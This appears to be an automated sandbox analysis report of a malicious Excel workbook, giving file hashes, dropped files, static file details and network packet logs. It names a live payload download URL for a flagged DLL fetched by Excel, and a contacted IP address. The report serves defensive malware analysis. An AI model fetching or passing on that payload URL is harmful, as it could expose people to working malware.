                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http_404[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):886272
                                                                                                                                                                Entropy (8bit):5.674513513570937
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:Ydk22FB2tfgklpVM5HdBcvLrXmF63WaSc:YdkDT29zaVg3WaSc
                                                                                                                                                                MD5:5BA7AC7FA4F9E831679832B6CC22AEE8
                                                                                                                                                                SHA1:813DF24AC22C2666B28BC3E7FB9BD1EEF2A7F395
                                                                                                                                                                SHA-256:D2C19AC3EACE29239BF919C442556ABF782DA5953325EE6B2626482FBF442F29
                                                                                                                                                                SHA-512:A345B0749D5745640FD7908CDB142960DA22AC6029BAFDDC0666D11EB5033756C3CFDE84D2FB94DCBF418DF40D2CE49EC4A18B919714402B7045B96E619A27CD
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                IE Cache URL:https://quickbooks.aeymotors.com/soft.dll
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\75810000
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):739934
                                                                                                                                                                Entropy (8bit):7.613757667716916
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:sRRb8XfJ2p7+wxj7QxYw8dKsWaqw+DfTtRdJyQzmiFx7llWA6zOLn1:sPD7Qy5WtFyinFxhlWAAOL1
                                                                                                                                                                MD5:919C71524C4AD38E68485B8EF18FFCFB
                                                                                                                                                                SHA1:84E886A19E5BAE94174EFCB36781BAE27F908606
                                                                                                                                                                SHA-256:00AA76BB22C8780C743BE7A458C145026EBF8F9BEE5264397575EF8A82BA3589
                                                                                                                                                                SHA-512:69D7BEB6A5271AB05F23AF87235C9655F9D3F0C24B301137C392D616E3278B9B8227E3E64F2578728E65AEF26AFEF52AB91124D6B01A4327DC864E0A64C2120D
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):89
                                                                                                                                                                Entropy (8bit):4.2887395101637535
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:oVXUbUvLJXUERAW8JOGXnEbUvLJXp7n:o9UwTJXUER9qEwTJXB
                                                                                                                                                                MD5:622796DA58F76A7D579E6ACB8805C986
                                                                                                                                                                SHA1:EF5F7DDAC8FFD14F554A59272ED31AFC9CF7A4B9
                                                                                                                                                                SHA-256:04FA0E5F8C76B043A09C80EA6E59DE6666DBBDDC0A0E22E4441993DE40DF7A18
                                                                                                                                                                SHA-512:A3AD28FF335B44AD90C01832347E001536FFB2F941EAB637C4DA81CBB0922BDFE8A3F5594544532A32B4A600C51964C63B06F7E0631EFE61206D7D45A96DC059
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: [2021/06/11 05:09:05.152] Latest deploy version: ..[2021/06/11 05:09:05.152] 11.211.2 ..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF0BD071FBB4571C26.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.4086481813194674
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lobF9loh9lWUi2Xw:kBqoIq0Ui2Xw
                                                                                                                                                                MD5:5776EA1EA24C4EF818C9B1F7930236FA
                                                                                                                                                                SHA1:6D6199A413F9643D95C6622E8384E92693BF6AE2
                                                                                                                                                                SHA-256:C58D4EF803F942EF52E6E5007470AF7A00F02DCF57113D59BA9CF2B569D1DB1D
                                                                                                                                                                SHA-512:73A9DCBE5E1BBCD7744929EDECDBC9CE612A0172E2E8FB51238D3224629388B39D2823D67E18C1A0B94662A7F3959D513BE3376D57763B4F0BADB635C409B4D1
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF0C381C9F25162F0F.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.40966523041045205
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9loYF9log9lWPZtZh:kBqoIrNBrh
                                                                                                                                                                MD5:8264579992805C3C669E9A52F23D0627
                                                                                                                                                                SHA1:D719FF0E06F5CA8461846BF5F9F30D815A163EFE
                                                                                                                                                                SHA-256:AFC54D813AF0ED5332197B49EB76AD0CCEDE6EB98DDAD093932671343776DE28
                                                                                                                                                                SHA-512:94C880FF9959FA655C2A2E617163ECBD4DBB3C89FCFA9B9C703998CE353492C3C9924771A38B15FB707E00073749EF7241A7A0765E4B3CC3BD2F94522E041C68
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF4271FDBD8E9E22F1.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.4125154592058443
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lomF9loK9lW8O3xj:kBqoIFz8+xj
                                                                                                                                                                MD5:4E1A34E11231735937ADCC05BB6858EB
                                                                                                                                                                SHA1:E87786FDE08C67CC84D7AF2434502A34ACC7244E
                                                                                                                                                                SHA-256:D1B6043A270856EE210590096D3E81E9917E031F4CC69983C6A846C26DC011FE
                                                                                                                                                                SHA-512:4FD191751847EB0E43BD9D52A63DB0657E5F6AC7FA337481AB82D570464221F65D91C5CA3FAEC721E156E52267ED57F80CEA5FC2F188064CC5D78869AEE1D92C
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF49A83EA77EEC1211.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.40990396631859316
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9loBsF9loBM9lWBx+9nLc:kBqoIBHBhBxEnLc
                                                                                                                                                                MD5:FC793D4F4F3DCC6D4B982980F49EBB0E
                                                                                                                                                                SHA1:F496C78BBFA85FFFDB361A425A5D9BFF098A4ACD
                                                                                                                                                                SHA-256:374E1C33805069F54CBFFBE5CD199555AAE8B1A220BEE4BA0B0A8A9433CDEA68
                                                                                                                                                                SHA-512:0048AC3407C53750A20F1EA840BECB4668602482A4B28CABFAD00B8E76C3F657C0E7EFFC23245DC12566C8BB5F8A9BDC0D33137A1E242B9041A3D0D18992DE2B
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF60CBFC830128400E.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40081
                                                                                                                                                                Entropy (8bit):0.6597804907804279
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:kBqoxKAuvScS+RP98fGc4UO/c4UOkc4UOx:kBqoxKAuqR+RP98fGcRO/cROkcROx
                                                                                                                                                                MD5:B41F07FE6AE34A2E20BB3E605299AFFB
                                                                                                                                                                SHA1:6F013EB3C0303609524F4C862F84A80A98C512A0
                                                                                                                                                                SHA-256:962EBFAE0C52F8995B951AEDE9B2B29C33BC646FDE6FFE6BD15E77F0F23BC08A
                                                                                                                                                                SHA-512:023EF050E473B6E022CC786306266F7D1EA5DE0C627626D63050CBD8F36567FA9C6DA3D02F76E30FBF342C4D2071707D4EEDCB7E1C6184412501B0CFC0393830
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF7C4D49990777E39E.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40049
                                                                                                                                                                Entropy (8bit):0.6534455629681263
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:kBqoxKAuvScS+vRT6h/Ug3DTDp7wUg3DTDp7zsg3DTDp79:kBqoxKAuqR+vRT6hMYzp7bYzp7QYzp79
                                                                                                                                                                MD5:A23E8DE3CD5D37D5F466898CE93B03B7
                                                                                                                                                                SHA1:B298765648C97CF0E69C77A6C23FF41B6EDE5EBA
                                                                                                                                                                SHA-256:65EBB07367E1FBB0F6D1E5CB45AB9E3AD7614D010F8C9093FDA3AE56D76659B3
                                                                                                                                                                SHA-512:F8E53D6711A7846730825F7C890DC43EA3D3F1B1970381C2C3A87418A040C178C37E117D2A1DDBDD335D9B6CA39F2320BB7E319CF5C2E612C8E17D0F9F77333F
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFC22BD3D12F5E2F3B.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40161
                                                                                                                                                                Entropy (8bit):0.6743315250600196
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:kBqoxKAuqR+npLCJ8ApcHX/ApcHXMApcHXJ:kBqoxKAuqR+npLCJ8nHvnH8nHZ
                                                                                                                                                                MD5:4295C4E20D4FB214EDF426348DB52151
                                                                                                                                                                SHA1:83A40621449F135465C3B8A0FCA9742FF01EEACA
                                                                                                                                                                SHA-256:7BDA9BD1427A2E850C01D9B8E037AC368A80366020826A3F7AC0623E874F7451
                                                                                                                                                                SHA-512:8DEE2CCA1EBB74BC12A8DD59E6D49F92BA52BB25660625A4243DE097FFC9E5D562A0FD1CF5502EDDAE5274BDE05C94692189678F75F58FFCCF932C6AE18659E6
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFF45289A08011A808.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40073
                                                                                                                                                                Entropy (8bit):0.6575076740212541
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:kBqoxKAuqR+8aAhK/LMPKV5JLMPKV5iLMPKV53:kBqoxKAuqR+8aAhK/L8KV7L8KVcL8KVJ
                                                                                                                                                                MD5:32969C2D72471F33B0A57C29E0A8A582
                                                                                                                                                                SHA1:EEB9747431108BEF30A6C4B4A4F656A508F84FA3
                                                                                                                                                                SHA-256:F2D93AF08709A19B73A1E55D748DB6109008D26B075F25A4207B5C2A7E080002
                                                                                                                                                                SHA-512:D18BDD675C7568E566562D0905A6305CE0185AAC8F0D5D529900A19D9EE95F4D65AE27D519D56DDFD835C04201E29C8FCCF5A45AAB7A88F897AC37D6D68A3F2F
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\Desktop\~$my_attach_82862.xlsb
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):165
                                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                                Entropy (8bit):7.837826149196617
                                                                                                                                                                TrID:
                                                                                                                                                                • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                                • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                                File name:my_attach_82862.xlsb
                                                                                                                                                                File size:300462
                                                                                                                                                                MD5:1f155a8f8c53066ef9dba8520cbcf346
                                                                                                                                                                SHA1:75dda503a5f1bbb11c8de9236ff237a7989e8e80
                                                                                                                                                                SHA256:29b13fa315a5249d1654221cf944f097ac4b0c42a133d07365cd3cc6afdd1a10
                                                                                                                                                                SHA512:f3e563c1b12cbd044c641a5cc7b0675ac0a589e01e898aea3105bef9e53f7bd2fe43b176e432955d21c8239a4c564588ed499d168c1f7bcd62337d09c1dffccd
                                                                                                                                                                SSDEEP:6144:HzL4syD+ZIa3R0RocOIHJKWQOBNRdvfAxupyHmEsHAzEKdkTtx5ooTadR/pLVo0M:D+VcGJRj5ooTadRdeFyinFxhlWAAOLf
                                                                                                                                                                File Content Preview:PK..........!.........r.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                                Static OLE Info

                                                                                                                                                                General

                                                                                                                                                                Document Type:OpenXML
                                                                                                                                                                Number of OLE Files:1

                                                                                                                                                                OLE File "my_attach_82862.xlsb"

                                                                                                                                                                Indicators

                                                                                                                                                                Has Summary Info:
                                                                                                                                                                Application Name:
                                                                                                                                                                Encrypted Document:
                                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                                Flash Objects Count:
                                                                                                                                                                Contains VBA Macros:

                                                                                                                                                                Macro 4.0 Code


Network Behavior

Network Port Distribution

TCP Packets

Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                Jun 11, 2021 05:06:41.634291887 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.820213079 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820245981 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820255041 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820292950 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820322990 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820354939 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820384979 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820432901 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820447922 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.820473909 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820488930 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.820552111 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.820576906 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820597887 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.820616007 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820666075 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820667028 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.820717096 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.820760965 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.820792913 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820856094 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.820914984 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.820990086 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.821014881 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.821068048 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.821084023 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.821109056 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.821147919 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.821162939 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.821199894 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.821228981 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.821244955 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.821269989 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.821311951 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.821336985 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.821351051 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.821374893 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.821419954 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.821440935 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.821470976 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.821517944 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.821522951 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.821563005 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.821604967 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.821629047 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.821675062 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.821706057 CEST4434971450.87.220.158192.168.2.3
